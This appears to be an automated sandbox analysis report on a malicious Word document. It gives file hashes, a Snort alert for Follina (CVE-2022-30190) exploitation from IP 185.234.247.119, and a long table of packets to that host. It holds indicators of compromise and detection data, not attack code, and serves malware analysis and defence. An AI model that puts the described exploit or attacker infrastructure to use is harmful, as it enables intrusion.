                                                                                                                                                                      Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:Microsoft OOXML
                                                                                                                                                                      Entropy (8bit):7.869060797789825
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                      • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                      File name:doc782.docx
                                                                                                                                                                      File size:10144
                                                                                                                                                                      MD5:e7015438268464cedad98b1544d643ad
                                                                                                                                                                      SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
                                                                                                                                                                      SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
                                                                                                                                                                      SHA512:d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad
                                                                                                                                                                      SSDEEP:192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2
                                                                                                                                                                      TLSH:A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C
                                                                                                                                                                      File Content Preview:PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:74fcd0d2d6d6d0cc

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      185.234.247.119192.168.2.2280491732036726 06/07/22-18:38:14.250872TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)8049173185.234.247.119192.168.2.22

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Jun 7, 2022 18:44:03.597018957 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:03.625045061 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:03.625144958 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:03.661154032 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:03.689227104 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:03.689259052 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:03.797730923 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:03.825808048 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:03.898449898 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:06.937927008 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.195615053 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.224698067 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.401380062 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.464498997 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.491985083 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.492104053 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.498353004 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.525945902 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.525994062 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.526021004 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.526053905 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.526104927 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.526123047 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.526155949 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.526196003 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.526221991 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.803332090 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:07.831824064 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:07.831989050 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.025104046 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.052786112 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.052884102 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.227951050 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.256129026 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.296071053 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.324341059 CEST8049752185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.363728046 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.391499996 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.391665936 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.398813963 CEST4975280192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.493047953 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:08.520741940 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:08.520881891 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:09.212635040 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:09.240037918 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:09.240113020 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:14.023246050 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:44:14.050962925 CEST8049758185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:44:14.051094055 CEST4975880192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.365149975 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.392676115 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.393069029 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.398526907 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.426112890 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563088894 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563114882 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563146114 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563169003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563191891 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563210011 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563225031 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563241005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563244104 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.563258886 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.563316107 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.563348055 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590662003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590702057 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590728998 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590776920 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590789080 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590801954 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590826988 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590842962 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590852022 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590876102 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590899944 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590907097 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590926886 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590953112 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.590965986 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.590977907 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591001987 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591006994 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.591027021 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591048956 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591049910 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.591073036 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591093063 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.591094017 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.591146946 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.596038103 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.596076012 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.596190929 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618658066 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618705988 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618731976 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618761063 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618786097 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618809938 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618828058 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618835926 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618861914 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618880987 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618886948 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618911982 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618932009 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618937016 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618959904 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.618964911 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.618993044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619009972 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619019032 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619045973 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619070053 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619071960 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619096041 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619106054 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619122028 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619148016 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619167089 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619174004 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619200945 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619225025 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619225979 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619251966 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619272947 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619277954 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619323969 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619349003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619375944 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619414091 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619755983 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619807959 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619832039 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619859934 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619870901 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619884014 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619909048 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.619932890 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619965076 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.619995117 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.623558044 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623594046 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623620033 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623642921 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.623647928 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.623678923 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.629533052 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.629687071 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.646960974 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.646986961 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647005081 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647026062 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647044897 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647063971 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647080898 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647099018 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647119045 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647136927 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647140980 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647156000 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647175074 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647192001 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647198915 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647209883 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647226095 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647228003 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647244930 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647252083 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647263050 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647281885 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647300005 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647310019 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647319078 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647336006 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647341967 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647351980 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647363901 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647370100 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647387028 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647403955 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647418976 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647420883 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647439957 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647458076 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647461891 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647474051 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647485971 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647491932 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647509098 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647527933 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647546053 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647564888 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647572041 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647583961 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647602081 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647614002 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647631884 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647754908 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647794962 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647799969 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.647813082 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647830009 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.647869110 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.651093960 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.651129007 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.651153088 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.651177883 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.651186943 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.651209116 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.657377958 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.657403946 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.657428026 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.657454967 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.657481909 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.657552004 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.657624006 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675266981 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675312996 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675333023 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675352097 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675369024 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675385952 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675399065 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675417900 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675426006 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675431013 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675447941 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675451040 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675456047 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675466061 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675487995 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675487995 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675494909 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675513029 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675535917 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675544024 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675556898 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675570965 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675587893 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675601006 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675620079 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675632000 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675637960 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675652027 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675663948 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675667048 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675681114 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675693989 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675704002 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675710917 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675726891 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675729036 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675745964 CEST8049781185.234.247.119192.168.2.4
                                                                                                                                                                      Jun 7, 2022 18:45:11.675745964 CEST4978180192.168.2.4185.234.247.119
                                                                                                                                                                      Jun 7, 2022 18:45:11.675762892 CEST8049781185.234.247.119192.168.2.4
